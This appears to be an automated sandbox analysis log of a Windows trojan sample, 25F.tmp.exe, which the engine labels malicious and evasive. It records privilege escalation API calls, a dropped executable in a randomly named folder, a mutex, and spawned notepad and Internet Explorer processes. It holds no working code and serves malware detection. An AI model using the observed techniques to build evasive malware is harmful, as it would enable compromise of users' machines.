            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0010BA00 appears 111 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 003FBA00 appears 74 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0010A310 appears 69 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0082BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0028BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 003DBA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0084BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0019BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0018BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0009B990 appears 72 times
            Source: 25F.tmp.exeBinary or memory string: OriginalFilenameChangeici4 vs 25F.tmp.exe
            Source: 25F.tmp.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal100.troj.evad.winEXE@13/38@6/2
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00364C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,4_2_00364C20
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_0036A550
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00404C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,4_2_00404C20
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0040A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_0040A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_003D4C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003DA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_003DA550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_00184C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00184C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_0018A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_2_0018A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_00384C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_00384C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_0038A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0038A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_00414C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,12_2_00414C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_0041A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0041A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,13_2_001B4C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001BA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_001BA550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_00354C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,14_2_00354C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_0035A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_0035A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_00314C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,15_2_00314C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_0031A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_0031A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_00384C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,16_2_00384C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_0038A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,16_2_0038A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_00104C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,17_2_00104C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_0010A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_0010A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_00104C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,18_2_00104C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_0010A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,18_2_0010A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_00224C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,19_2_00224C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_0022A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,19_2_0022A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_00324C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,20_2_00324C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_0032A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_0032A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_00514C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,21_2_00514C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_0051A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,21_2_0051A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_00194C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,22_2_00194C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_0019A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,22_2_0019A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_00844C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,23_2_00844C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_0084A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,23_2_0084A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_00404C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,25_2_00404C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_0040A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,25_2_0040A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_00824C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,26_2_00824C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_0082A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,26_2_0082A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_00094C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,27_2_00094C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_0009A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,27_2_0009A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,29_2_005D4C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005DA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,29_2_005DA550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_00094C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,30_2_00094C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_0009A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,30_2_0009A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_00914C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,31_2_00914C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_0091A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,31_2_0091A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_00394C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,32_2_00394C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_0039A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,32_2_0039A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_00094C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,33_2_00094C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_0009A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,33_2_0009A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00224C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,34_2_00224C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_0022A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,34_2_0022A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00154C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,35_2_00154C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_0015A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,35_2_0015A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,36_2_007F4C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007FA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,36_2_007FA550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00254C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,37_2_00254C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_0025A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,37_2_0025A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00264C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,38_2_00264C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_0026A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,38_2_0026A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,39_2_003F4C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003FA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,39_2_003FA550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,40_2_003F4C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003FA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,40_2_003FA550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00284C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,41_2_00284C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_0028A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,41_2_0028A550
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00104C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,42_2_00104C20
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_0010A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,42_2_0010A550
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00605F28 GetDiskFreeSpaceA,0_2_00605F28
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036EE40 CoCreateInstance,memset,lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFileInfoA,memset,lstrcpyA,lstrcatA,MultiByteToWideChar,4_2_0036EE40
            Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\History\LowJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMutant created: \Sessions\1\BaseNamedObjects\-d1ff3a37Mutex
            Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3A6EF28F490D6D3E.TMPJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeFile read: C:\Users\user\Desktop\25F.tmp.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\25F.tmp.exe "C:\Users\user\Desktop\25F.tmp.exe"
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exe
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Windows\notepad.exe "C:\Windows\notepad.exe"
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exe
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
            Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Windows\notepad.exe "C:\Windows\notepad.exe" Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE" Jump to behavior
            Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\notepad.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\notepad.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
